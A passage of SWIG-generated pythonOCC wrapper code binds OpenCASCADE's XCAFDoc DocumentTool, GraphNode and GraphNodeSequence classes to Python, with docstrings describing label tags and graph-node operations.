    def LayersLabel(*args):
        """
        * Returns sub-label of DocLabel() with tag 3.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_LayersLabel(*args)
    LayersLabel = staticmethod(LayersLabel)
    def DGTsLabel(*args):
        """
        * Returns sub-label of DocLabel() with tag 4.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_DGTsLabel(*args)
    DGTsLabel = staticmethod(DGTsLabel)
    def MaterialsLabel(*args):
        """
        * Returns sub-label of DocLabel() with tag 5.
        :param acces:
        :type acces: TDF_Label &
        :rtype: TDF_Label
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_MaterialsLabel(*args)
    MaterialsLabel = staticmethod(MaterialsLabel)
    def ShapeTool(*args):
        """
        * Creates (if it does not exist) ShapeTool attribute on ShapesLabel().
        :param acces:
        :type acces: TDF_Label &
        :rtype: Handle_XCAFDoc_ShapeTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_ShapeTool(*args)
    ShapeTool = staticmethod(ShapeTool)
    def ColorTool(*args):
        """
        * Creates (if it does not exist) ColorTool attribute on ColorsLabel().
        :param acces:
        :type acces: TDF_Label &
        :rtype: Handle_XCAFDoc_ColorTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_ColorTool(*args)
    ColorTool = staticmethod(ColorTool)
    def LayerTool(*args):
        """
        * Creates (if it does not exist) LayerTool attribute on LayersLabel().
        :param acces:
        :type acces: TDF_Label &
        :rtype: Handle_XCAFDoc_LayerTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_LayerTool(*args)
    LayerTool = staticmethod(LayerTool)
    def DimTolTool(*args):
        """
        * Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
        :param acces:
        :type acces: TDF_Label &
        :rtype: Handle_XCAFDoc_DimTolTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_DimTolTool(*args)
    DimTolTool = staticmethod(DimTolTool)
    def MaterialTool(*args):
        """
        * Creates (if it does not exist) DimTolTool attribute on DGTsLabel().
        :param acces:
        :type acces: TDF_Label &
        :rtype: Handle_XCAFDoc_MaterialTool
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_MaterialTool(*args)
    MaterialTool = staticmethod(MaterialTool)
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_DocumentTool_swiginit(self,_XCAFDoc.new_XCAFDoc_DocumentTool(*args))
    def Init(self, *args):
        """
        * to be called when reading this attribute from file
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_Init(self, *args)
    def Destroy(self, *args):
        """
        * Unregisters the document holding this attribute from an internal global map of XDE documents.
        :rtype: void
        """
        return _XCAFDoc.XCAFDoc_DocumentTool_Destroy(self, *args)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_DocumentTool self)"""
        return _XCAFDoc.XCAFDoc_DocumentTool__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_DocumentTool self) -> Handle_XCAFDoc_DocumentTool"""
        return _XCAFDoc.XCAFDoc_DocumentTool_GetHandle(self)
    def __del__(self):
        # Delayed destruction via the shared GarbageCollector; swallow all
        # errors so teardown during interpreter shutdown never raises.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# Bind the flat C wrapper functions as instance methods and register the class.
XCAFDoc_DocumentTool.Init = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_Init,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool.Destroy = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_Destroy,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool__kill_pointed,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_DocumentTool_GetHandle,None,XCAFDoc_DocumentTool)
XCAFDoc_DocumentTool_swigregister = _XCAFDoc.XCAFDoc_DocumentTool_swigregister
XCAFDoc_DocumentTool_swigregister(XCAFDoc_DocumentTool)
# Module-level alias of the static method XCAFDoc_DocumentTool.GetID.
def XCAFDoc_DocumentTool_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_GetID(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.Set.
def XCAFDoc_DocumentTool_Set(*args):
    """
    * Create (if not exist) DocumentTool attribute on 0.1 label if <IsAcces> is true, else on <L> label. This label will be returned by DocLabel(); If the attribute is already set it won't be reset on <L> even if <IsAcces> is false. ColorTool and ShapeTool attributes are also set by this method.
    :param L:
    :type L: TDF_Label &
    :param IsAcces: default value is Standard_True
    :type IsAcces: bool
    :rtype: Handle_XCAFDoc_DocumentTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_Set(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.IsXCAFDocument.
def XCAFDoc_DocumentTool_IsXCAFDocument(*args):
    """
    :param Doc:
    :type Doc: Handle_TDocStd_Document &
    :rtype: bool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_IsXCAFDocument(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.DocLabel.
def XCAFDoc_DocumentTool_DocLabel(*args):
    """
    * Returns the label where the DocumentTool attribute is, or 0.1 if DocumentTool is not yet set.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_DocLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.ShapesLabel.
def XCAFDoc_DocumentTool_ShapesLabel(*args):
    """
    * Returns sub-label of DocLabel() with tag 1.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_ShapesLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.ColorsLabel.
def XCAFDoc_DocumentTool_ColorsLabel(*args):
    """
    * Returns sub-label of DocLabel() with tag 2.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.LayersLabel.
def XCAFDoc_DocumentTool_LayersLabel(*args):
    """
    * Returns sub-label of DocLabel() with tag 3.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_LayersLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.DGTsLabel.
def XCAFDoc_DocumentTool_DGTsLabel(*args):
    """
    * Returns sub-label of DocLabel() with tag 4.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_DGTsLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.MaterialsLabel.
def XCAFDoc_DocumentTool_MaterialsLabel(*args):
    """
    * Returns sub-label of DocLabel() with tag 5.
    :param acces:
    :type acces: TDF_Label &
    :rtype: TDF_Label
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_MaterialsLabel(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.ShapeTool.
def XCAFDoc_DocumentTool_ShapeTool(*args):
    """
    * Creates (if it does not exist) the ShapeTool attribute on ShapesLabel().
    :param acces:
    :type acces: TDF_Label &
    :rtype: Handle_XCAFDoc_ShapeTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_ShapeTool(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.ColorTool.
def XCAFDoc_DocumentTool_ColorTool(*args):
    """
    * Creates (if it does not exist) the ColorTool attribute on ColorsLabel().
    :param acces:
    :type acces: TDF_Label &
    :rtype: Handle_XCAFDoc_ColorTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_ColorTool(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.LayerTool.
def XCAFDoc_DocumentTool_LayerTool(*args):
    """
    * Creates (if it does not exist) the LayerTool attribute on LayersLabel().
    :param acces:
    :type acces: TDF_Label &
    :rtype: Handle_XCAFDoc_LayerTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_LayerTool(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.DimTolTool.
def XCAFDoc_DocumentTool_DimTolTool(*args):
    """
    * Creates (if it does not exist) the DimTolTool attribute on DGTsLabel().
    :param acces:
    :type acces: TDF_Label &
    :rtype: Handle_XCAFDoc_DimTolTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_DimTolTool(*args)
# Module-level alias of the static method XCAFDoc_DocumentTool.MaterialTool.
def XCAFDoc_DocumentTool_MaterialTool(*args):
    """
    * Creates (if it does not exist) the MaterialTool attribute on MaterialsLabel().
    :param acces:
    :type acces: TDF_Label &
    :rtype: Handle_XCAFDoc_MaterialTool
    """
    return _XCAFDoc.XCAFDoc_DocumentTool_MaterialTool(*args)
class Handle_XCAFDoc_DocumentTool(OCC.TDF.Handle_TDF_Attribute):
    """OCCT handle (reference-counted smart pointer) to XCAFDoc_DocumentTool."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_DocumentTool_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_DocumentTool(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring for the handle class, then type registration.
Handle_XCAFDoc_DocumentTool.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_Nullify,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_IsNull,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool_GetObject,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_DocumentTool__kill_pointed,None,Handle_XCAFDoc_DocumentTool)
Handle_XCAFDoc_DocumentTool_swigregister = _XCAFDoc.Handle_XCAFDoc_DocumentTool_swigregister
Handle_XCAFDoc_DocumentTool_swigregister(Handle_XCAFDoc_DocumentTool)
# NOTE: the Python wrapper def below is immediately shadowed by the direct
# C binding on the following line; both are emitted by SWIG as generated.
def Handle_XCAFDoc_DocumentTool_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast(*args)
Handle_XCAFDoc_DocumentTool_DownCast = _XCAFDoc.Handle_XCAFDoc_DocumentTool_DownCast
class XCAFDoc_GraphNode(OCC.TDF.TDF_Attribute):
    """Attribute linking labels into a father/child graph (OCAF GraphNode)."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    # Placeholder def, rebound below via staticmethod() (SWIG-generated pattern).
    def Find(*args):
        """
        * class methods working on the node =================================== Shortcut to search a Graph node attribute with default GraphID. Returns true if found.
        :param L:
        :type L: TDF_Label &
        :param G:
        :type G: Handle_XCAFDoc_GraphNode &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_GraphNode_Find(*args)
    Find = staticmethod(Find)
    def Set(*args):
        """
        * Finds or Creates a GraphNode attribute on the label <L> with the default Graph ID, returned by the method <GetDefaultGraphID>. Returns the created/found GraphNode attribute.
        :param L:
        :type L: TDF_Label &
        :rtype: Handle_XCAFDoc_GraphNode
        * Finds or Creates a GraphNode attribute on the label <L>, with an explicit tree ID. <ExplicitGraphID> is the ID returned by <TDF_Attribute::ID> method. Returns the found/created GraphNode attribute.
        :param L:
        :type L: TDF_Label &
        :param ExplicitGraphID:
        :type ExplicitGraphID: Standard_GUID &
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNode_Set(*args)
    Set = staticmethod(Set)
    def GetDefaultGraphID(*args):
        """
        * returns a default Graph ID. this ID is used by the <Set> method without explicit tree ID. Instance methods: ================
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_GraphNode_GetDefaultGraphID(*args)
    GetDefaultGraphID = staticmethod(GetDefaultGraphID)
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_GraphNode_swiginit(self,_XCAFDoc.new_XCAFDoc_GraphNode(*args))
    def SetGraphID(self, *args):
        """
        :param explicitID:
        :type explicitID: Standard_GUID &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNode_SetGraphID(self, *args)
    def SetFather(self, *args):
        """
        * Set GraphNode <F> as father of me and returns index of <F> in the Sequence containing Fathers GraphNodes. return index of <F> from GraphNodeSequence
        :param F:
        :type F: Handle_XCAFDoc_GraphNode &
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_SetFather(self, *args)
    def SetChild(self, *args):
        """
        * Set GraphNode <Ch> as child of me and returns index of <Ch> in the Sequence containing Children GraphNodes. return index of <Ch> from GraphNodeSequence
        :param Ch:
        :type Ch: Handle_XCAFDoc_GraphNode &
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_SetChild(self, *args)
    def UnSetFather(self, *args):
        """
        * Remove <F> from Fathers GraphNodeSequence. and remove link between father and child.
        :param F:
        :type F: Handle_XCAFDoc_GraphNode &
        :rtype: None
        * Remove Father GraphNode by index from Fathers GraphNodeSequence. and remove link between father and child.
        :param Findex:
        :type Findex: int
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNode_UnSetFather(self, *args)
    def UnSetChild(self, *args):
        """
        * Remove <Ch> from GraphNodeSequence. and remove link between father and child.
        :param Ch:
        :type Ch: Handle_XCAFDoc_GraphNode &
        :rtype: None
        * Remove Child GraphNode by index from Children GraphNodeSequence. and remove link between father and child.
        :param Chindex:
        :type Chindex: int
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNode_UnSetChild(self, *args)
    def GetFather(self, *args):
        """
        * Return GraphNode by index from GraphNodeSequence.
        :param Findex:
        :type Findex: int
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNode_GetFather(self, *args)
    def GetChild(self, *args):
        """
        * Return GraphNode by index from GraphNodeSequence.
        :param Chindex:
        :type Chindex: int
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNode_GetChild(self, *args)
    def FatherIndex(self, *args):
        """
        * Return index of <F>, or zero if there is no such Graphnode.
        :param F:
        :type F: Handle_XCAFDoc_GraphNode &
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_FatherIndex(self, *args)
    def ChildIndex(self, *args):
        """
        * Return index of <Ch>, or zero if there is no such Graphnode.
        :param Ch:
        :type Ch: Handle_XCAFDoc_GraphNode &
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_ChildIndex(self, *args)
    def IsFather(self, *args):
        """
        * returns True if <self> is father of <Ch>.
        :param Ch:
        :type Ch: Handle_XCAFDoc_GraphNode &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_GraphNode_IsFather(self, *args)
    def IsChild(self, *args):
        """
        * returns True if <self> is child of <F>.
        :param F:
        :type F: Handle_XCAFDoc_GraphNode &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_GraphNode_IsChild(self, *args)
    def NbFathers(self, *args):
        """
        * return Number of Fathers GraphNodes.
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_NbFathers(self, *args)
    def NbChildren(self, *args):
        """
        * return Number of Children GraphNodes. Implementation of Attribute methods: ===================================
        :rtype: int
        """
        return _XCAFDoc.XCAFDoc_GraphNode_NbChildren(self, *args)
    def DumpToString(self):
        """DumpToString(XCAFDoc_GraphNode self) -> std::string"""
        return _XCAFDoc.XCAFDoc_GraphNode_DumpToString(self)
    # SWIG/pythonOCC internal helper (see _kill_pointed on sibling classes).
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_GraphNode self)"""
        return _XCAFDoc.XCAFDoc_GraphNode__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_GraphNode self) -> Handle_XCAFDoc_GraphNode"""
        return _XCAFDoc.XCAFDoc_GraphNode_GetHandle(self)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring: rebind placeholder methods to C-level instance
# methods, then register the proxy type with the extension module.
XCAFDoc_GraphNode.SetGraphID = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetGraphID,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.SetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.SetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_SetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.UnSetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_UnSetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.UnSetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_UnSetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.FatherIndex = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_FatherIndex,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.ChildIndex = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_ChildIndex,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.IsFather = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_IsFather,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.IsChild = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_IsChild,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.NbFathers = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_NbFathers,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.NbChildren = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_NbChildren,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_DumpToString,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode__kill_pointed,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNode_GetHandle,None,XCAFDoc_GraphNode)
XCAFDoc_GraphNode_swigregister = _XCAFDoc.XCAFDoc_GraphNode_swigregister
XCAFDoc_GraphNode_swigregister(XCAFDoc_GraphNode)
# Module-level alias of the static method XCAFDoc_GraphNode.Find.
def XCAFDoc_GraphNode_Find(*args):
    """
    * class methods working on the node =================================== Shortcut to search a Graph node attribute with default GraphID. Returns true if found.
    :param L:
    :type L: TDF_Label &
    :param G:
    :type G: Handle_XCAFDoc_GraphNode &
    :rtype: bool
    """
    return _XCAFDoc.XCAFDoc_GraphNode_Find(*args)
# Module-level alias of the static method XCAFDoc_GraphNode.Set.
def XCAFDoc_GraphNode_Set(*args):
    """
    * Finds or Creates a GraphNode attribute on the label <L> with the default Graph ID, returned by the method <GetDefaultGraphID>. Returns the created/found GraphNode attribute.
    :param L:
    :type L: TDF_Label &
    :rtype: Handle_XCAFDoc_GraphNode
    * Finds or Creates a GraphNode attribute on the label <L>, with an explicit tree ID. <ExplicitGraphID> is the ID returned by <TDF_Attribute::ID> method. Returns the found/created GraphNode attribute.
    :param L:
    :type L: TDF_Label &
    :param ExplicitGraphID:
    :type ExplicitGraphID: Standard_GUID &
    :rtype: Handle_XCAFDoc_GraphNode
    """
    return _XCAFDoc.XCAFDoc_GraphNode_Set(*args)
# Module-level alias of the static method XCAFDoc_GraphNode.GetDefaultGraphID.
def XCAFDoc_GraphNode_GetDefaultGraphID(*args):
    """
    * returns a default Graph ID. this ID is used by the <Set> method without explicit tree ID. Instance methods: ================
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_GraphNode_GetDefaultGraphID(*args)
class Handle_XCAFDoc_GraphNode(OCC.TDF.Handle_TDF_Attribute):
    """OCCT handle (reference-counted smart pointer) to XCAFDoc_GraphNode."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_GraphNode_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_GraphNode(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring for the handle class, then type registration.
Handle_XCAFDoc_GraphNode.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_Nullify,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_IsNull,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode_GetObject,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_GraphNode__kill_pointed,None,Handle_XCAFDoc_GraphNode)
Handle_XCAFDoc_GraphNode_swigregister = _XCAFDoc.Handle_XCAFDoc_GraphNode_swigregister
Handle_XCAFDoc_GraphNode_swigregister(Handle_XCAFDoc_GraphNode)
# NOTE: the Python wrapper def below is immediately shadowed by the direct
# C binding on the following line; both are emitted by SWIG as generated.
def Handle_XCAFDoc_GraphNode_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast(*args)
Handle_XCAFDoc_GraphNode_DownCast = _XCAFDoc.Handle_XCAFDoc_GraphNode_DownCast
class XCAFDoc_GraphNodeSequence(OCC.TCollection.TCollection_BaseSequence):
    """Sequence of Handle_XCAFDoc_GraphNode items.

    NOTE(review): OCCT sequences are conventionally 1-based — confirm against
    the TCollection documentation before relying on index arithmetic.
    """
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_GraphNodeSequence_swiginit(self,_XCAFDoc.new_XCAFDoc_GraphNodeSequence(*args))
    def Clear(self, *args):
        """
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Clear(self, *args)
    def Assign(self, *args):
        """
        :param Other:
        :type Other: XCAFDoc_GraphNodeSequence &
        :rtype: XCAFDoc_GraphNodeSequence
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Assign(self, *args)
    def Set(self, *args):
        """
        :param Other:
        :type Other: XCAFDoc_GraphNodeSequence &
        :rtype: XCAFDoc_GraphNodeSequence
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Set(self, *args)
    def Append(self, *args):
        """
        Overloaded: append a single node or a whole sequence.
        :param T:
        :type T: Handle_XCAFDoc_GraphNode &
        :rtype: None
        :param S:
        :type S: XCAFDoc_GraphNodeSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Append(self, *args)
    def Prepend(self, *args):
        """
        Overloaded: prepend a single node or a whole sequence.
        :param T:
        :type T: Handle_XCAFDoc_GraphNode &
        :rtype: None
        :param S:
        :type S: XCAFDoc_GraphNodeSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Prepend(self, *args)
    def InsertBefore(self, *args):
        """
        Overloaded: insert a single node or a whole sequence before Index.
        :param Index:
        :type Index: int
        :param T:
        :type T: Handle_XCAFDoc_GraphNode &
        :rtype: None
        :param Index:
        :type Index: int
        :param S:
        :type S: XCAFDoc_GraphNodeSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_InsertBefore(self, *args)
    def InsertAfter(self, *args):
        """
        Overloaded: insert a single node or a whole sequence after Index.
        :param Index:
        :type Index: int
        :param T:
        :type T: Handle_XCAFDoc_GraphNode &
        :rtype: None
        :param Index:
        :type Index: int
        :param S:
        :type S: XCAFDoc_GraphNodeSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_InsertAfter(self, *args)
    def First(self, *args):
        """
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_First(self, *args)
    def Last(self, *args):
        """
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Last(self, *args)
    def Split(self, *args):
        """
        :param Index:
        :type Index: int
        :param Sub:
        :type Sub: XCAFDoc_GraphNodeSequence &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Split(self, *args)
    def Value(self, *args):
        """
        :param Index:
        :type Index: int
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Value(self, *args)
    def SetValue(self, *args):
        """
        :param Index:
        :type Index: int
        :param I:
        :type I: Handle_XCAFDoc_GraphNode &
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_SetValue(self, *args)
    def ChangeValue(self, *args):
        """
        :param Index:
        :type Index: int
        :rtype: Handle_XCAFDoc_GraphNode
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_ChangeValue(self, *args)
    def Remove(self, *args):
        """
        Overloaded: remove one element by Index, or a range FromIndex..ToIndex.
        :param Index:
        :type Index: int
        :rtype: None
        :param FromIndex:
        :type FromIndex: int
        :param ToIndex:
        :type ToIndex: int
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_GraphNodeSequence_Remove(self, *args)
    def __del__(self):
        # Best-effort cleanup; bare except is deliberate (interpreter shutdown).
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
# SWIG runtime wiring: rebind placeholder methods to C-level instance
# methods, then register the proxy type with the extension module.
XCAFDoc_GraphNodeSequence.Clear = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Clear,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Assign = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Assign,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Set = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Set,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Append = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Append,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Prepend = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Prepend,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.InsertBefore = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_InsertBefore,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.InsertAfter = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_InsertAfter,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.First = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_First,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Last = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Last,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Split = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Split,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Value = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Value,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.SetValue = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_SetValue,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.ChangeValue = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_ChangeValue,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence.Remove = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence_Remove,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_GraphNodeSequence__kill_pointed,None,XCAFDoc_GraphNodeSequence)
XCAFDoc_GraphNodeSequence_swigregister = _XCAFDoc.XCAFDoc_GraphNodeSequence_swigregister
XCAFDoc_GraphNodeSequence_swigregister(XCAFDoc_GraphNodeSequence)
